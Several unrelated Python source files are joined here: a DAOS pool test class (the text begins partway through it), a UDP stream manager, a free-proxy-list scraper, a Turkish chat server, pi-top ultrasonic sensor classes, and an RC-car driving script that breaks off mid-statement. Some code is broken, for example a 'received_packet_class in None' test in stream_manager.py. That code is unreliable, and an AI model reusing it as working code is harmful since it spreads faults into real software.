(Default : 100 secs) """ start_time = 0 finish_time = 0 start_time = time.time() while int(finish_time - start_time) < loop_time: if action == "exclude": output = self.dmg_command.pool_exclude(self.pool.uuid, rank) else: output = self.dmg_command.pool_drain(self.pool.uuid, rank) self.print_and_assert_on_rebuild_failure(output) output = self.dmg_command.pool_reintegrate(self.pool.uuid, rank) self.print_and_assert_on_rebuild_failure(output) finish_time = time.time() @fail_on(DaosApiError) def write_single_object(self): """Write some data to the existing pool.""" self.pool.connect(2) csum = self.params.get("enable_checksum", '/run/container/*') self.container = DaosContainer(self.context) input_param = self.container.cont_input_values input_param.enable_chksum = csum self.container.create(poh=self.pool.pool.handle, con_prop=input_param) self.container.open() self.obj = DaosObj(self.context, self.container) self.obj.create(objcls=1) self.obj.open() self.ioreq = IORequest(self.context, self.container, self.obj, objtype=4) self.log.info("Writing the Single Dataset") for dkey in range(self.no_of_dkeys): for akey in range(self.no_of_akeys): indata = ("{0}".format(str(akey)[0]) * self.record_length) d_key_value = "dkey {0}".format(dkey) c_dkey = create_string_buffer(d_key_value) a_key_value = "akey {0}".format(akey) c_akey = create_string_buffer(a_key_value) c_value = create_string_buffer(indata) c_size = ctypes.c_size_t(ctypes.sizeof(c_value)) self.ioreq.single_insert(c_dkey, c_akey, c_value, c_size) self.obj.close() self.container.close() @fail_on(DaosApiError) def verify_single_object(self): """Verify the container data on the existing pool.""" self.pool.connect(2) self.container.open() self.obj.open() self.log.info("Single Dataset Verification -- Started") for dkey in range(self.no_of_dkeys): for akey in range(self.no_of_akeys): indata = ("{0}".format(str(akey)[0]) * self.record_length) c_dkey = create_string_buffer("dkey {0}".format(dkey)) c_akey = create_string_buffer("akey {0}".format(akey)) val = self.ioreq.single_fetch(c_dkey, c_akey, len(indata)+1) if indata != (repr(val.value)[1:-1]): self.d_log.error("ERROR:Data mismatch for " "dkey = {0}, " "akey = {1}".format( "dkey {0}".format(dkey), "akey {0}".format(akey))) self.fail("ERROR: Data mismatch for dkey = {0}, akey={1}" .format("dkey {0}".format(dkey), "akey {0}".format(akey))) self.obj.close() self.container.close() def prepare_cont_ior_write_read(self, oclass, flags): """This method prepares the containers for IOR write and read invocations. To enable aggregation: - Create two containers and read always from first container Normal usage (use only a single container): - Create a single container and use the same. Args: oclass (str): IOR object class flags (str): IOR flags """ self.log.info(self.pool_cont_dict) # If pool is not in the dictionary, # initialize its container list to None # {poolA : [None, None], [None, None]} if self.pool not in self.pool_cont_dict: self.pool_cont_dict[self.pool] = [None] * 4 # Create container if the pool doesn't have one. # Otherwise, use the existing container in the pool. # pool_cont_dict {pool A: [containerA, Updated, # containerB, Updated], # pool B : containerA, Updated, # containerB, None]} if self.pool_cont_dict[self.pool][0] is None: self.add_container(self.pool, create=False) self.set_cont_class_properties(oclass) if self.test_with_checksum is False: tmp = self.get_object_replica_value(oclass) rf_value = "rf:{}".format(tmp - 1) self.update_cont_properties(rf_value) self.container.create() self.pool_cont_dict[self.pool][0] = self.container self.pool_cont_dict[self.pool][1] = "Updated" else: if ((self.test_during_aggregation is True) and (self.pool_cont_dict[self.pool][1] == "Updated") and (self.pool_cont_dict[self.pool][3] is None) and ("-w" in flags)): # Write to the second container self.add_container(self.pool, create=False) self.set_cont_class_properties(oclass) if self.test_with_checksum is False: tmp = self.get_object_replica_value(oclass) rf_value = "rf:{}".format(tmp - 1) self.update_cont_properties(rf_value) self.container.create() self.pool_cont_dict[self.pool][2] = self.container self.pool_cont_dict[self.pool][3] = "Updated" else: self.container = self.pool_cont_dict[self.pool][0] def delete_extra_container(self, pool): """Delete the extra container in the pool. Refer prepare_cont_ior_write_read. This method should be called when OSA tests intend to enable aggregation. Args: pool (object): pool handle """ self.pool.set_property("reclaim", "time") extra_container = self.pool_cont_dict[pool][2] extra_container.destroy() self.pool_cont_dict[pool][3] = None def get_object_replica_value(self, oclass): """ Get the object replica value for an object class. Args: oclass (str): Object Class (eg: RP_2G1,etc) Returns: value (int) : Object replica value """ value = 0 if "_" in oclass: replica_list = oclass.split("_") value = replica_list[1][0] else: self.log.info("Wrong Object Class. Cannot split") return int(value) def update_cont_properties(self, cont_prop): """Update the existing container properties. Args: cont_prop (str): Replace existing container properties with new value """ self.container.properties.value = cont_prop def set_cont_class_properties(self, oclass="S1"): """Update the container class to match the IOR/Mdtest object class. Fix the rf factor based on object replica value. Also, remove the redundancy factor for S type object class. Args: oclass (str, optional): Container object class to be set. Defaults to "S1". """ self.container.oclass.value = oclass # Set the container properties properly for S!, S2 class. # rf should not be set to 1 for S type object class. x = re.search("^S\\d$", oclass) prop = self.container.properties.value if x is not None: prop = prop.replace("rf:1", "rf:0") else: tmp = self.get_object_replica_value(oclass) rf_value = "rf:{}".format(tmp - 1) prop = prop.replace("rf:1", rf_value) self.container.properties.value = prop # Over-write oclass settings if using redundancy factor # and self.test_with_rf is True. # This has to be done so that container created doesn't # use the object class. if self.test_with_rf is True and \ "rf" in self.container.properties.value: self.log.info( "Detected container redundancy factor: %s", self.container.properties.value) self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass") self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass") self.container.oclass.update(None) def assert_on_exception(self, out_queue=None): """Assert on exception while executing an application. Args: out_queue (queue): Check whether the queue is empty. If empty, app (ior, mdtest) didn't encounter error. """ if out_queue is None: out_queue = self.out_queue if out_queue.empty(): pass else: exc = out_queue.get(block=False) out_queue.put(exc) raise CommandFailure(exc) def cleanup_queue(self, out_queue=None): """Cleanup the existing thread queue. Args: out_queue (queue): Queue to cleanup. """ if out_queue is None: out_queue = self.out_queue while not out_queue.empty(): out_queue.get(block=True) def run_ior_thread(self, action, oclass, test, single_cont_read=True, fail_on_warning=True, pool=None): """Start the IOR thread for either writing or reading data to/from a container. Args: action (str): Start the IOR thread with Read or Write oclass (str): IOR object class test (list): IOR test sequence flags (str): IOR flags single_cont_read (bool) : Always read from the 1st container. Defaults to True. fail_on_warning (bool) : Test terminates for IOR warnings. Defaults to True. pool (TestPool): Pool to run ior on. Defaults to None. """ # Intermediate (between correct and hack) implementation for allowing a # pool to be passed in. Needs to be fixed by making the pool argument # required. if pool is None: pool = self.pool self.cleanup_queue() if action == "Write": flags = self.ior_w_flags else: flags = self.ior_r_flags # Add a thread for these IOR arguments process = threading.Thread(target=self.ior_thread, kwargs={"pool": pool, "oclass": oclass, "test": test, "flags": flags, "single_cont_read": single_cont_read, "fail_on_warning": fail_on_warning}) # Launch the IOR thread process.start() # Wait for the thread to finish process.join() if not self.out_queue.empty(): self.assert_on_exception() def ior_thread(self, pool, oclass, test, flags, single_cont_read=True, fail_on_warning=True): """Start an IOR thread. Args: pool (object): pool handle oclass (str): IOR object class, container class. test (list): IOR test sequence flags (str): IOR flags single_cont_read (bool) : Always read from the 1st container. Defaults to True. fail_on_warning (bool) : Test terminates for IOR warnings. Defaults to True. """ self.cleanup_queue() self.pool = pool self.ior_cmd.get_params(self) self.ior_cmd.set_daos_params(self.server_group, self.pool) self.log.info("Redundancy Factor : %s", self.test_with_rf) self.ior_cmd.dfs_oclass.update(oclass) self.ior_cmd.dfs_dir_oclass.update(oclass) if single_cont_read is True: # Prepare the containers created and use in a specific # way defined in prepare_cont_ior_write. self.prepare_cont_ior_write_read(oclass, flags) elif single_cont_read is False and self.container is not None: # Here self.container is having actual value. Just use it. self.log.info(self.container) else: self.fail("Not supported option on ior_thread") try: job_manager = self.get_ior_job_manager_command() except CommandFailure as err_msg: self.out_queue.put(err_msg) self.assert_on_exception() job_manager.job.dfs_cont.update(self.container.uuid) self.ior_cmd.transfer_size.update(test[2]) self.ior_cmd.block_size.update(test[3]) self.ior_cmd.flags.update(flags) # Update oclass settings if using redundancy factor # and self.test_with_rf is True. if self.test_with_rf is True and \ "rf" in self.container.properties.value: self.log.info( "Detected container redundancy factor: %s", self.container.properties.value) self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass") self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass") self.run_ior_with_pool(create_pool=False, create_cont=False, fail_on_warning=fail_on_warning, out_queue=self.out_queue) if not self.out_queue.empty(): self.assert_on_exception() def run_mdtest_thread(self, oclass="RP_2G1"): """Start mdtest thread and wait until thread completes. Args: oclass (str): IOR object class, container class. """ # Create container only self.mdtest_cmd.dfs_destroy = False create_container = 0 if self.container is None: self.add_container(self.pool, create=False) create_container = 1 self.mdtest_cmd.dfs_oclass.update(oclass) self.set_cont_class_properties(oclass) if self.test_with_checksum is False: tmp = self.get_object_replica_value(oclass) rf_value = "rf:{}".format(tmp - 1) self.update_cont_properties(rf_value) if create_container == 1: self.container.create() job_manager = self.get_mdtest_job_manager_command(self.manager) job_manager.job.dfs_cont.update(self.container.uuid) # Add a thread for these IOR arguments process = threading.Thread(target=self.execute_mdtest) # Launch the MDtest thread process.start() # Wait for the thread to finish process.join() if not self.out_queue.empty(): self.assert_on_exception()
stream_manager.py
from socket import * from struct import pack from threading import Thread from src.stream.protocol.packet import ServerboundPacket class StreamManager: def __init__(self, cefstream): self.cefstream = cefstream self.server = None self.client = None self.packets = [] def launch(self): port = self.cefstream.get_port() self.cefstream.get_logger().info('Streaming Socket *::{port}'.format(port=port)) self.server = socket(AF_INET, SOCK_DGRAM) self.server.bind(('127.0.0.1', port)) self.listen() def listen(self): data, address = self.server.recvfrom(1024) self.cefstream.get_logger().info('Connection: {address}'.format(address=str(address))) client_thread = Thread(target=self.listen_client, args=(self, address), name='ClientThread::{address}'.format(address=str(address))) client_thread.start() self.client = address self.cefstream.get_logger().info('Listening for packets') def listen_client(self, stream_manager, address): packets = ServerboundPacket.__subclasses__() while True: packet_id = self.server.recvfrom(1) received_packet_class = None for packet in packets: if packet.get_packet_id() in packet_id: received_packet_class = packet break if received_packet_class in None: self.cefstream.get_logger().warn("Unknown packet " + packet_id) continue packet = received_packet_class() packet.receive(self.cefstream, self.server) self.cefstream.get_logger().info("Message: " + packet_id) def send(self, packet): if self.client is None: return # packet.send(self.cefstream, self.server, self.client) def shutdown(self): self.server.close()
proxyScraper.py
import requests from bs4 import BeautifulSoup import threading import os import asyncio import argparse pathTextFile = '' proxyType = '' # From proxyscrape.com def proxyscrapeScraper(proxytype, timeout, country): response = requests.get("https://api.proxyscrape.com/?request=getproxies&proxytype=" + proxytype + "&timeout=" + timeout + "&country=" + country) proxies = response.text with open(pathTextFile, "a") as txt_file: txt_file.write(proxies) # From proxy-list.download def proxyListDownloadScraper(url, type, anon): session = requests.session() url = url + '?type=' + type + '&anon=' + anon html = session.get(url).text if args.verbose: print(url) with open(pathTextFile, "a") as txt_file: for line in html.split('\n'): if len(line) > 0: txt_file.write(line) # From sslproxies.org, free-proxy-list.net, us-proxy.org, socks-proxy.net def makesoup(url): page=requests.get(url) if args.verbose: print(url + ' scraped successfully') return BeautifulSoup(page.text,"html.parser") def proxyscrape(table): proxies = set() for row in table.findAll('tr'): fields = row.findAll('td') count = 0 proxy = "" for cell in row.findAll('td'): if count == 1: proxy += ":" + cell.text.replace('&nbsp;', '') proxies.add(proxy) break proxy += cell.text.replace('&nbsp;', '') count += 1 return proxies def scrapeproxies(url): soup=makesoup(url) result = proxyscrape(table = soup.find('table', attrs={'id': 'proxylisttable'})) proxies = set() proxies.update(result) with open(pathTextFile, "a") as txt_file: for line in proxies: txt_file.write("".join(line) + "\n") # output watcher def output(): if os.path.exists(pathTextFile): os.remove(pathTextFile) elif not os.path.exists(pathTextFile): with open(pathTextFile, 'w'): pass if __name__ == "__main__": global proxy parser = argparse.ArgumentParser() parser.add_argument("-p", "--proxy", help="Supported proxy type: http ,https, socks, socks4, socks5", required=True) parser.add_argument("-o", "--output", help="output file name to save .txt file", default='output.txt') parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true") args = parser.parse_args() proxy = args.proxy pathTextFile = args.output if proxy == 'https': threading.Thread(target=scrapeproxies, args=('http://sslproxies.org',)).start() threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'https', 'elite',)).start() # threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'https', 'transparent',)).start() # threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'https', 'anonymous',)).start() output() if proxy == 'http': threading.Thread(target=scrapeproxies, args=('http://free-proxy-list.net',)).start() threading.Thread(target=scrapeproxies, args=('http://us-proxy.org',)).start() threading.Thread(target=proxyscrapeScraper, args=('http','1000','All',)).start() threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'http', 'elite',)).start() threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'http', 'transparent',)).start() threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'http', 'anonymous',)).start() output() if proxy == 'socks': threading.Thread(target=scrapeproxies, args=('http://socks-proxy.net',)).start() threading.Thread(target=proxyscrapeScraper, args=('socks4','1000','All',)).start() threading.Thread(target=proxyscrapeScraper, args=('socks5','1000','All',)).start() threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks5', 'elite',)).start() threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks4', 'elite',)).start() output() if proxy == 'socks4': threading.Thread(target=proxyscrapeScraper, args=('socks4','1000','All',)).start() threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks4', 'elite',)).start() output() if proxy == 'socks5': threading.Thread(target=proxyscrapeScraper, args=('socks5','1000','All',)).start() threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks5', 'elite',)).start() output()
sunucu.py
import socket import threading sahip = socket.gethostbyname(socket.gethostname()) port = 8436 baglantilar = [] print(""" %@@@,,,*@@@ @@@@@@@@%,,,,,*@@@@@@@@* Red Arrow ağına hoşgeldiniz... /@@@@@@@@@@#,,,,,,,/@@@@@@@@@@@ @@@@@@@@@@@@#,,,,,,,,,,@@@@@@@@@@@@ @@@@@@@@@@@@@,,,,,,,,,,,,,@@@@@@@@@@@@@ @@@@@@@@@@@@@,,,,,,,,,,,,,,,@@@@@@@@@@@@@# .@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@% @@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@ *@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@ @@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@ @@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@ @@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@* *@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@ /@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@ @@@,,,,,,,,,,,,,,,@@@,,,,,,,,,,,,,,,@@@ .,,,,,,,,,,,,@@@@@@@@@@@,,,,,,,,,,,,@ ,,,,,,,,,&@@@@@@@@@@@@@@@@@(,,,,,,,,, ,,,,,,,&@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,, ,,,, #@@@@@@@@@@@@@& .,,,. Devam etmek için 'ENTER' bas. """) hosgeldin_mesaji = "Kırmızı Ok'a hoşgeldiniz...\n Sunucu bağlantınız başarıyla kuruldu!" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((sahip,port)) onayli_ipler = [] def sunucuyu_baslat(TH): global kullanici_baglandi try: kullanici_sayisi = input("Maksimum kullanici sayisi: ") s.listen(int(kullanici_sayisi)) except socket.error as bildirim: print("Bir hata oluştu: ",bildirim) print(TH) def baglanti_bekle(TH): print(TH) while True: global onayli_ipler client,addr = s.accept() onayli_ipler_dosya = open("onayli_ipler.txt","r") veri = onayli_ipler_dosya.read() for ip in veri.split("\n"): if ip in onayli_ipler: pass else: onayli_ipler.append(ip) print("kayit bulundu:",ip) print(addr) onayli_ipler_dosya.close() if addr[0] in onayli_ipler: print("okey!",onayli_ipler) baglantilar.append(client) client.send(hosgeldin_mesaji.encode()) print("<Yeni kullanici> ",addr) for i in baglantilar: try: i.send(str(("<Yeni kullanici> ",addr)).encode('utf-8')) except socket.error as hata_kodu: print("[hata]",hata_kodu) baglantilar.remove(i) break pass def mesaj_bekleme(TH): print(TH) while True: if baglantilar != []: for i in baglantilar: try: i.settimeout(0.1) veri = i.recv(256) if veri.decode() != "": print(veri.decode()) for k in baglantilar: try: k.send(veri) except: baglantilar.remove(k) print("kullanici Ayrildi!") except socket.timeout as hata_kodu: pass t1 = threading.Thread(target=baglanti_bekle, args = ("Baglanti bekleme aktif !", )) t2 = threading.Thread(target=mesaj_bekleme, args = ("Mesaj bekleniyor...",)) sunucuyu_baslat("Sunucu Başlatıldı...") t1.start() t2.start()
ultrasonic_sensor_base.py
import atexit import time from abc import abstractmethod from collections import deque from sched import scheduler from threading import Event, Lock, Thread import numpy as np from gpiozero import SmoothedInputDevice from pitop.common.common_ids import FirmwareDeviceID from pitop.common.firmware_device import ( FirmwareDevice, PTInvalidFirmwareDeviceException, ) from pitop.common.logger import PTLogger from pitop.common.singleton import Singleton from pitop.pma.common.utils import get_pin_for_port from .common.ultrasonic_registers import ( UltrasonicConfigSettings, UltrasonicRegisters, UltrasonicRegisterTypes, ) from .plate_interface import PlateInterface class UltrasonicSensorBase: _max_distance = None threshold = None @property def max_distance(self): return self._max_distance @max_distance.setter def max_distance(self, value): if value <= 0: raise ValueError("invalid maximum distance (must be positive)") t = self.threshold_distance self._max_distance = value self.threshold_distance = t @property def threshold_distance(self): return self.threshold * self.max_distance @threshold_distance.setter def threshold_distance(self, value): self.threshold = value / self.max_distance @property def distance(self): return self.value * self._max_distance @abstractmethod def in_range(self): raise NotImplementedError @abstractmethod def value(self): raise NotImplementedError @abstractmethod def pin(self): raise NotImplementedError @abstractmethod def close(self): raise NotImplementedError @abstractmethod def wait_for_active(self, timeout=None): raise NotImplementedError @abstractmethod def wait_for_inactive(self, timeout=None): raise NotImplementedError class CompatibilityCheck(metaclass=Singleton): __MIN_FIRMWARE_MAJOR_VERSION = 22 def __init__(self): self.check() def check(self): try: firmware_device = FirmwareDevice(FirmwareDeviceID.pt4_expansion_plate) if ( firmware_device.get_fw_version_major() < self.__MIN_FIRMWARE_MAJOR_VERSION ): raise RuntimeError( "Usage of the analog ports for the Ultrasonic Sensor requires an Expansion Plate with " f"a minimum version version of V{self.__MIN_FIRMWARE_MAJOR_VERSION}. " f"Please update your Expansion Plate firmware to continue." ) except PTInvalidFirmwareDeviceException: raise RuntimeError( "Please use an Expansion Plate in order to use the analog ports for the Ultrasonic " "Sensor." ) class UltrasonicSensorMCU(UltrasonicSensorBase): __MIN_FIRMWARE_MAJOR_VERSION = 22 def __init__( self, port_name, queue_len, max_distance, threshold_distance, partial, name ): self._pma_port = port_name self.name = name # Distance readings if max_distance <= 0: raise ValueError("invalid maximum distance (must be positive)") self._max_distance = max_distance self._filtered_distance = max_distance self.threshold = threshold_distance / max_distance self._data_read_dt = 0.1 self.__queue_len = queue_len self.__data_queue = deque(maxlen=self.__queue_len) # MCU configuration self.__mcu_device = PlateInterface().get_device_mcu() CompatibilityCheck() self.__registers = UltrasonicRegisters[self._pma_port] self.__configure_mcu() # User-programmable callbacks self.when_activated = None self.when_deactivated = None # Data state self.__partial = partial self.__data_ready = False self.__active = True # Thread communication self.__new_reading_event = Event() self.__activated_event = Event() self.__deactivated_event = Event() if self.__partial: self.__data_ready = True else: self.__queue_check = Thread(target=self.__queue_filled_check, daemon=True) self.__queue_check.start() # Data read loop self._read_scheduler = Thread(target=self.__read_scheduler, daemon=True) self._read_scheduler.start() # Monitor for changes from active to inactive or vice versa self.__state_check = Thread(target=self.__state_monitor, daemon=True) self.__state_check.start() atexit.register(self.close) def __configure_mcu(self): self.__mcu_device.write_byte( self.__registers[UltrasonicRegisterTypes.CONFIG], UltrasonicConfigSettings[self._pma_port], ) @property def value(self): while not self.__data_ready: time.sleep(self._data_read_dt) return min(1.0, self._filtered_distance / self._max_distance) @property def pin(self): print( "An Ultrasonic Sensor connected to an analog port is controlled directly by the MCU and does not have an" "associated Raspberry Pi pin. Returning None." ) return None def close(self): self.__mcu_device.write_byte( self.__registers[UltrasonicRegisterTypes.CONFIG], 0x00 ) @property def in_range(self): return not self.__active def wait_for_active(self, timeout=None): self.__activated_event.wait(timeout=timeout) def wait_for_inactive(self, timeout=None): self.__deactivated_event.wait(timeout=timeout) def __read_scheduler(self): s = scheduler(time.time, time.sleep) s.enter(self._data_read_dt, 1, self.__read_loop, (s,)) s.run() def __read_loop(self, s): self.__data_queue.append(self.__read_distance()) self._filtered_distance = np.median(self.__data_queue) self.__new_reading_event.set() self.__new_reading_event.clear() s.enter(self._data_read_dt, 1, self.__read_loop, (s,)) def __state_monitor(self): while True: self.__new_reading_event.wait() if self.__data_ready: self.__check_for_state_change() def __check_for_state_change(self): if self.__active and self.__inactive_criteria(): self.__was_deactivated() return if not self.__active and self.__active_criteria(): self.__was_activated() return def __active_criteria(self): return self._filtered_distance >= self.threshold_distance def __inactive_criteria(self): return not self.__active_criteria() def __was_activated(self): if callable(self.when_activated): self.when_activated() self.__active = True self.__activated_event.set() self.__activated_event.clear() def __was_deactivated(self): if callable(self.when_deactivated): self.when_deactivated() self.__active = False self.__deactivated_event.set() self.__deactivated_event.clear() def __queue_filled_check(self): while True: self.__new_reading_event.wait() if self.__queue_len == len(self.__data_queue): self.__data_ready = True break def __read_distance(self): distance = ( self.__mcu_device.read_unsigned_word( register_address=self.__registers[UltrasonicRegisterTypes.DATA], little_endian=True, ) / 100 ) if distance == 0: return self._max_distance return distance # Modified version of gpiozero's DistanceSensor class that only uses 1 pin # # Note: all private member variables are semi-private to follow upstream gpiozero convention # and to override inherited functions class UltrasonicSensorRPI(SmoothedInputDevice, UltrasonicSensorBase): ECHO_LOCK = Lock() def __init__( self, port_name, queue_len=3, max_distance=3, threshold_distance=0.3, partial=True, name="ultrasonic", ): self._pma_port = port_name self.name = name SmoothedInputDevice.__init__( self, get_pin_for_port(self._pma_port), pull_up=False, queue_len=queue_len, sample_wait=0.1, partial=partial, ignore=frozenset({None}), ) try: if max_distance <= 0: raise ValueError("invalid maximum distance (must be positive)") self._max_distance = max_distance self.threshold = threshold_distance / max_distance self.speed_of_sound = 343.26 # m/s self._echo = Event() self._echo_rise = None self._echo_fall = None self.pin.edges = "both" self.pin.bounce = None self.pin.when_changed = self._echo_changed self._queue.start() except Exception: self.close() raise def close(self): try: super(UltrasonicSensorRPI, self).close() except RuntimeError: PTLogger.debug( f"Ultrasonic Sensor on port {self._pma_port} - " "there was an error in closing the port!" ) @property def value(self): return super(UltrasonicSensorRPI, self).value @property def pin(self): return super(UltrasonicSensorRPI, self).pin def _echo_changed(self, ticks, level): if level: self._echo_rise = ticks else: self._echo_fall = ticks self._echo.set() def _read(self): # Wait up to 50ms for the echo pin to fall to low (the maximum echo # pulse is 35ms so this gives some leeway); if it doesn't something is # horribly wrong (most likely at the hardware level) if self.pin.state: if not self._echo.wait(0.05): PTLogger.debug( f"Ultrasonic Sensor on port {self._pma_port} - " "no echo received, not using value" ) return None self._echo.clear() self._echo_fall = None self._echo_rise = None # Obtain the class-level ECHO_LOCK to ensure multiple distance sensors # don't listen for each other's "pings" with UltrasonicSensorRPI.ECHO_LOCK: # Wait up to 200ms for the echo pin to rise and fall if self._echo.wait(0.2): if self._echo_fall is not None and self._echo_rise is not None: distance = ( self.pin_factory.ticks_diff(self._echo_fall, self._echo_rise) * self.speed_of_sound / 2.0 ) return round(min(1.0, distance / self._max_distance), 2) else: # If we only saw the falling edge it means we missed # the echo because it was too fast return None else: # The echo pin never rose or fell - assume that distance is max PTLogger.debug( f"Ultrasonic Sensor on port {self._pma_port} - " "no echo received, using max distance " ) return 1.0 @property def in_range(self): return not self.is_active
rc_driver_overtake.py
__author__ = 'robin' import threading import SocketServer import serial import cv2 import numpy as np import math # distance data measured by ultrasonic sensor sensor_data = " " class NeuralNetwork(object): def __init__(self): self.model = cv2.ANN_MLP() def create(self): layer_size = np.int32([38400, 32, 4]) self.model.create(layer_size) self.model.load('mlp_xml/mlp.xml') def predict(self, samples): ret, resp = self.model.predict(samples) return resp.argmax(-1) class RCControl(object): def __init__(self): self.serial_port = serial.Serial('COM8', 115200, timeout=1) def steer(self, prediction): if prediction == 2: self.serial_port.write(chr(1)) print("Forward") elif prediction == 0: self.serial_port.write(chr(7)) print("Left") elif prediction == 1: self.serial_port.write(chr(6)) print("Right") else: self.serial_port.write(chr(0)) #self.stop() def stop(self): self.serial_port.write(chr(0)) def over(self): self.serial_port.write(chr(6)) class DistanceToCamera(object): def __init__(self): # camera params self.alpha = 8.0 * math.pi / 180 self.v0 = 119.865631204 self.ay = 332.262498472 def calculate(self, v, h, x_shift, image): # compute and return the distance from the target point to the camera d = h / math.tan(self.alpha + math.atan((v - self.v0) / self.ay)) if d > 0: cv2.putText(image, "%.1fcm" % d, (image.shape[1] - x_shift, image.shape[0] - 20), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 2) return d class ObjectDetection(object): def __init__(self): self.red_light = False self.green_light = False self.yellow_light = False def detect(self, cascade_classifier, gray_image, image): # y camera coordinate of the target point 'P' v = 0 # minimum value to proceed traffic light state validation threshold = 150 # detection cascade_obj = cascade_classifier.detectMultiScale( gray_image, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30), flags=cv2.cv.CV_HAAR_SCALE_IMAGE ) # draw a rectangle around the objects for (x_pos, y_pos, width, height) in cascade_obj: cv2.rectangle(image, (x_pos + 5, y_pos + 5), (x_pos + width - 5, y_pos + height - 5), (255, 255, 255), 2) v = y_pos + height - 5 # print(x_pos+5, y_pos+5, x_pos+width-5, y_pos+height-5, width, height) # stop sign if width / height == 1: cv2.putText(image, 'STOP', (x_pos, y_pos - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2) # traffic lights else: roi = gray_image[y_pos + 10:y_pos + height - 10, x_pos + 10:x_pos + width - 10] mask = cv2.GaussianBlur(roi, (25, 25), 0) (minVal, maxVal, minLoc, maxLoc) = cv2.minMaxLoc(mask) # check if light is on if maxVal - minVal > threshold: cv2.circle(roi, maxLoc, 5, (255, 0, 0), 2) # Red light if 1.0 / 8 * (height - 30) < maxLoc[1] < 4.0 / 8 * (height - 30): cv2.putText(image, 'Red', (x_pos + 5, y_pos - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) self.red_light = True # Green light elif 5.5 / 8 * (height - 30) < maxLoc[1] < height - 30: cv2.putText(image, 'Green', (x_pos + 5, y_pos - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2) self.green_light = True # yellow light # elif 4.0/8*(height-30) < maxLoc[1] < 5.5/8*(height-30): # cv2.putText(image, 'Yellow', (x_pos+5, y_pos - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 255), 2) # self.yellow_light = True return v class SensorDataHandler(SocketServer.BaseRequestHandler): data = " " def handle(self): global sensor_data try: while self.data: self.data = self.request.recv(1024) sensor_data = round(float(self.data), 1) # print "{} sent:".format(self.client_address[0]) print sensor_data finally: print "Connection closed on thread 2" class VideoStreamHandler(SocketServer.StreamRequestHandler): # h1: stop sign h1 = 15.5 - 10 # cm # h2: traffic light h2 = 15.5 - 10 # create neural network model = NeuralNetwork() model.create() obj_detection = ObjectDetection() rc_car = RCControl() # cascade classifiers stop_cascade = cv2.CascadeClassifier('cascade_xml/stop_sign.xml') light_cascade = cv2.CascadeClassifier('cascade_xml/traffic_light.xml') d_to_camera = DistanceToCamera() d_stop_sign = 25 d_light = 25 stop_start = 0 # start time when stop at the stop sign stop_finish = 0 stop_time = 0 drive_time_after_stop = 0 def handle(self): global sensor_data stream_bytes = ' ' stop_flag = False stop_sign_active = True # stream video frames one by one try: while True: stream_bytes += self.rfile.read(1024) first = stream_bytes.find('\xff\xd8') last = stream_bytes.find('\xff\xd9') if first != -1 and last != -1: jpg = stream_bytes[first:last + 2] stream_bytes = stream_bytes[last + 2:] gray = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.CV_LOAD_IMAGE_GRAYSCALE) image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.CV_LOAD_IMAGE_UNCHANGED) # lower half of the image half_gray = gray[120:240, :] # object detection v_param1 = self.obj_detection.detect(self.stop_cascade, gray, image) v_param2 = self.obj_detection.detect(self.light_cascade, gray, image) # distance measurement if v_param1 > 0 or v_param2 > 0: d1 = self.d_to_camera.calculate(v_param1, self.h1, 300, image) d2 = self.d_to_camera.calculate(v_param2, self.h2, 100, image) self.d_stop_sign = d1 self.d_light = d2 cv2.imshow('image', image) cv2.imshow('mlp_image', half_gray) # reshape image image_array = half_gray.reshape(1, 38400).astype(np.float32) # neural network makes prediction prediction = self.model.predict(image_array) # stop conditions if sensor_data is not None and sensor_data < 50: print("Stop, obstacle in front") self.rc_car.over() elif 0 < self.d_stop_sign < 25 and stop_sign_active: print("Stop sign ahead") self.rc_car.stop() # stop for 5 seconds if stop_flag is False: self.stop_start = cv2.getTickCount() stop_flag = True self.stop_finish = cv2.getTickCount() self.stop_time = (self.stop_finish - self.stop_start) / cv2.getTickFrequency() print "Stop time: %.2fs" % self.stop_time # 5 seconds later, continue driving if self.stop_time > 5: print("Waited for 5 seconds") stop_flag = False stop_sign_active = False elif 0 < self.d_light < 30: # print("Traffic light ahead") if self.obj_detection.red_light: print("Red light") self.rc_car.stop() elif 